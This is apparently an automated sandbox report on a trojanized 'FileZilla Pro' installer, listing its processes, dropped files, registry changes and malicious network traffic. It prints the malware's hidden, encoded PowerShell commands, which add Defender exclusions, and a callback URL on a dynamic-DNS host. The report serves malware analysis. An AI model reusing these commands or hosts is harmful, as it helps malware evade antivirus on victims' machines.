File name:

FileZilla Pro 3.69.1 (x86).exe

Full analysis: https://app.any.run/tasks/c5f98cf7-c486-4fa5-96ef-fe463a56472b
Verdict: Malicious activity
Analysis date: April 29, 2025, 13:14:43
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
advancedinstaller
phishing
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 7 sections
MD5:

00D766FD0F7BCF3858AA2D7D3FD540B9

SHA1:

B9C0305E9F4147AE319F4F690DECEB5FE23579FD

SHA256:

7F401672FDE74E85AA1F32B9DD6A523144363250483AB02859F2FE3946C15663

SSDEEP:

196608:k29p9hWlVJWlbJnUZi+cEt5NfthAbcwvuJQEady2E:x9pjWlV4b56TcEtDtS5HE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • s.exe (PID: 7700)
    • Changes powershell execution policy (Bypass)

      • msiexec.exe (PID: 2692)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 8140)
      • powershell.exe (PID: 1188)
      • powershell.exe (PID: 7308)
    • Registers / Runs the DLL via REGSVR32.EXE

      • s.exe (PID: 7700)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2196)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 8140)
      • powershell.exe (PID: 1188)
      • powershell.exe (PID: 7308)
  • SUSPICIOUS

    • ADVANCEDINSTALLER mutex has been found

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • Reads the Windows owner or organization settings

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7424)
    • Malware-specific behavior (creating "System.dll" in Temp)

      • s.exe (PID: 7700)
    • Creates a software uninstall entry

      • s.exe (PID: 7700)
    • Detects AdvancedInstaller (YARA)

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • Process drops legitimate windows executable

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
    • Executable content was dropped or overwritten

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • powershell.exe (PID: 6388)
      • VC_redist.x64.exe (PID: 7400)
      • VC_redist.x86.exe (PID: 7824)
      • dotNetFx46_Full_setup.exe (PID: 6760)
      • Value.exe (PID: 7700)
      • CanReuseTransform.exe (PID: 7236)
    • Reads security settings of Internet Explorer

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • VC_redist.x64.exe (PID: 7400)
    • The process creates files with name similar to system file names

      • s.exe (PID: 7700)
    • There is functionality for taking screenshot (YARA)

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
    • Creates/Modifies COM task schedule object

      • regsvr32.exe (PID: 896)
      • s.exe (PID: 7700)
    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 2692)
    • The process hide an interactive prompt from the user

      • msiexec.exe (PID: 2692)
    • The process bypasses the loading of PowerShell profile settings

      • msiexec.exe (PID: 2692)
    • The process executes Powershell scripts

      • msiexec.exe (PID: 2692)
    • Application launched itself

      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • Executing commands from a ".bat" file

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • cmd.exe (PID: 7416)
      • cmd.exe (PID: 1912)
    • Starts CMD.EXE for commands execution

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 7416)
    • The process executes via Task Scheduler

      • Value.exe (PID: 7700)
      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 8140)
      • powershell.exe (PID: 1188)
      • Value.exe (PID: 6048)
      • powershell.exe (PID: 7308)
      • CanReuseTransform.exe (PID: 7236)
    • Connects to unusual port

      • RegSvcs.exe (PID: 6416)
  • INFO

    • The sample compiled with english language support

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 7424)
    • Checks supported languages

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7424)
      • msiexec.exe (PID: 7516)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 3900)
      • msiexec.exe (PID: 4452)
      • msiexec.exe (PID: 2692)
      • VC_redist.x64.exe (PID: 7400)
      • info.exe (PID: 7628)
      • VC_redist.x86.exe (PID: 7824)
    • Reads Environment values

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7516)
      • msiexec.exe (PID: 4452)
      • msiexec.exe (PID: 2692)
    • Reads the computer name

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • msiexec.exe (PID: 7424)
      • msiexec.exe (PID: 7516)
      • s.exe (PID: 7700)
      • msiexec.exe (PID: 4452)
      • msiexec.exe (PID: 2692)
      • msiexec.exe (PID: 3900)
      • VC_redist.x64.exe (PID: 7400)
      • info.exe (PID: 7628)
      • VC_redist.x86.exe (PID: 7824)
    • Creates files in the program directory

      • s.exe (PID: 7700)
    • Create files in a temporary directory

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • s.exe (PID: 7700)
      • VC_redist.x64.exe (PID: 7400)
      • powershell.exe (PID: 6388)
    • Process checks computer location settings

      • FileZilla Pro 3.69.1 (x86).exe (PID: 7332)
      • VC_redist.x64.exe (PID: 7400)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7424)
    • Reads the software policy settings

      • powershell.exe (PID: 6388)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6388)
    • Reads the machine GUID from the registry

      • VC_redist.x86.exe (PID: 7824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (18)
.exe | Win32 Executable (generic) (2.9)
.exe | Generic Win/DOS Executable (1.3)
.exe | DOS Executable Generic (1.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:03 13:51:40+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.43
CodeSize: 2920960
InitializedDataSize: 1194496
UninitializedDataSize: -
EntryPoint: 0x2351b0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: Debug
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: GetintoWAY
FileDescription: FileZilla Pro 3.69.1 (x86) Installer
FileVersion: 0.0.0.0
InternalName: FileZilla Pro 3.69.1 (x86)
LegalCopyright: Copyright (C) 2025 GetintoWAY
OriginalFileName: FileZilla Pro 3.69.1 (x86).exe
ProductName: FileZilla Pro 3.69.1 (x86)
ProductVersion: 0.0.0.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
176
Monitored processes
43
Malicious processes
3
Suspicious processes
9

Behavior graph

Click at the process to see the details
start filezilla pro 3.69.1 (x86).exe msiexec.exe msiexec.exe no specs s.exe regsvr32.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs powershell.exe conhost.exe no specs vc_redist.x64.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs attrib.exe no specs attrib.exe no specs attrib.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs info.exe conhost.exe no specs #PHISHING svchost.exe vc_redist.x86.exe powershell.exe no specs conhost.exe no specs slui.exe dotnetfx46_full_setup.exe powershell.exe no specs conhost.exe no specs value.exe powershell.exe no specs conhost.exe no specs value.exe no specs regsvcs.exe canreusetransform.exe powershell.exe no specs conhost.exe no specs filezilla pro 3.69.1 (x86).exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
896"C:\WINDOWS\system32\regsvr32.exe" /s "C:\Program Files (x86)\FileZilla Pro\fzshellext_64.dll"C:\Windows\System32\regsvr32.exes.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1188"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBNAHAAUABSAEUARgBlAFIAZQBuAEMAZQAgAC0ARQB4AEMATABVAHMASQBvAE4AUABBAHQAaAAgAEMAOgBcAFcASQBOAEQATwBXAFMAXABzAHkAcwB0AGUAbQAzADIAXABjAG8AbgBmAGkAZwBcAHMAeQBzAHQAZQBtAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYQBmAGUAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFYAYQBsAHUAZQAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVwBJAE4ARABPAFcAUwBcAFQARQBNAFAAXAAgAC0ARgBPAHIAYwBlADsAIABhAEQARAAtAG0AcABQAHIARQBmAGUAcgBFAG4AQwBlACAALQBFAFgAQwBsAFUAUwBJAG8AbgBQAFIAbwBDAEUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFcASQBOAEQATwBXAFMAXABzAHkAcwB0AGUAbQAzADIAXABjAG8AbgBmAGkAZwBcAHMAeQBzAHQAZQBtAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYQBmAGUAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFYAYQBsAHUAZQAuAGUAeABlACAALQBGAG8AUgBjAGUAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1568"powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAcABSAEUARgBFAHIAZQBOAEMAZQAgAC0AZQBYAEMAbABVAFMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUwBhAGYAZQBXAGEAaQB0AEgAYQBuAGQAbABlAFwAVgBhAGwAdQBlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBDAGUAOwAgAEEAZABEAC0ATQBQAFAAcgBFAEYARQBSAEUATgBDAEUAIAAtAEUAWABDAEwAVQBTAGkAbwBOAFAAUgBvAEMARQBTAFMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABTAGEAZgBlAFcAYQBpAHQASABhAG4AZABsAGUAXABWAGEAbAB1AGUALgBlAHgAZQAgAC0ARgBPAFIAQwBFAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1912C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\EXE76DB.bat" "C:\Windows\SysWOW64\cmd.exeFileZilla Pro 3.69.1 (x86).exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2692C:\Windows\syswow64\MsiExec.exe -Embedding 1C74A9B652D9A33968471B2E617F6227 E Global\MSI0000C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
3900C:\Windows\syswow64\MsiExec.exe -Embedding 78F4B332C0643D969549C933A613C254 CC:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
4400\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4452C:\Windows\syswow64\MsiExec.exe -Embedding D6697974D98126E5162921C1EC4F48BBC:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
5576\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
31 193
Read events
31 100
Write events
84
Delete events
9

Modification events

(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Version
Value:
3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Package
Value:
1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\FileZilla Pro
Operation:writeName:Updated
Value:
0
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:UninstallString
Value:
"C:\Program Files (x86)\FileZilla Pro\uninstall.exe"
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:InstallLocation
Value:
C:\Program Files (x86)\FileZilla Pro
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayName
Value:
FileZilla Pro 3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayIcon
Value:
C:\Program Files (x86)\FileZilla Pro\FileZilla.exe
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:DisplayVersion
Value:
3.69.1
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:URLInfoAbout
Value:
https://filezilla-project.org/
(PID) Process:(7700) s.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Pro
Operation:writeName:URLUpdateInfo
Value:
https://filezilla-project.org/
Executable files
59
Suspicious files
142
Text files
732
Unknown types
0

Dropped files

PID
Process
Filename
Type
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\FileZilla Pro.msi
MD5:
SHA256:
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\shiCF29.tmpexecutable
MD5:84A34BF3486F7B9B7035DB78D78BDD1E
SHA256:F85911C910B660E528D2CF291BAA40A92D09961996D6D84E7A53A7095C7CD96E
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\holder0.aiphbinary
MD5:0A0B3892D3BE447FE6F8C135918294DE
SHA256:DA15FBC5965F11F8D75A513BA05AB0B9CBB49E4A24F66BA965A8029B9C61C114
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSICF97.tmpexecutable
MD5:2330EBBE491C6026AF5E8853F3692798
SHA256:15C35C5ABF7BAB8D1375F5622E31DA14FD027AE1046B8A6DDFD74263FA34EDA6
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\Newimage
MD5:1E80DE80CEFEE55D7CFDA0DF2EDCF3B2
SHA256:4E64F4E40D8CBFF082B37186C831AF4B49E3131C62C00A0CF53E0A6E7E24AC2B
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\dialog.jpgimage
MD5:5F6253CFF5A8B031BFB3B161079D0D86
SHA256:36D9BAB35D1E4B50045BF902F5D42B6F865488C75F6E60FC00A6CD6F69034AB0
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\completiimage
MD5:C23AF89757665BC0386FD798A61B2112
SHA256:031ED0378F819926D7B5B2C6C9367A0FB1CBAE40E1A3959E2652FE30A47D52F2
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSID025.tmpexecutable
MD5:2330EBBE491C6026AF5E8853F3692798
SHA256:15C35C5ABF7BAB8D1375F5622E31DA14FD027AE1046B8A6DDFD74263FA34EDA6
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\MSID121.tmpexecutable
MD5:C9EF0378879C57A38C075BB28B88FCAB
SHA256:6E7CDAB18E1F705C0EA56A565577DB0389ECE2B5A4E0F31D3063E9103F59FBEE
7332FileZilla Pro 3.69.1 (x86).exeC:\Users\admin\AppData\Local\Temp\AI_EXTUI_BIN_7332\infoimage
MD5:8595D2A2D58310B448729E28649443D6
SHA256:27F13C4829994B214BB1A26EEF474DA67C521FD429536CB8421BA2F7C3E02B5F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
19
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.147:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
8120
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8120
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7628
info.exe
GET
200
82.115.223.212:80
http://stats-1.crabdance.com/api/record?t=a10
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
23.48.23.147:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.147
  • 23.48.23.155
  • 23.48.23.176
  • 23.48.23.174
  • 23.48.23.153
  • 23.48.23.191
  • 23.48.23.140
  • 23.48.23.177
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.46
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.4
  • 40.126.32.72
  • 20.190.160.5
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.132
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted
lofhr.com
  • 185.208.156.66
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.crabdance .com Domain
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Suspected Phishing Domain ( .crabdance .com)
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS HTTP Request to a *.crabdance .com Domain
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
No debug info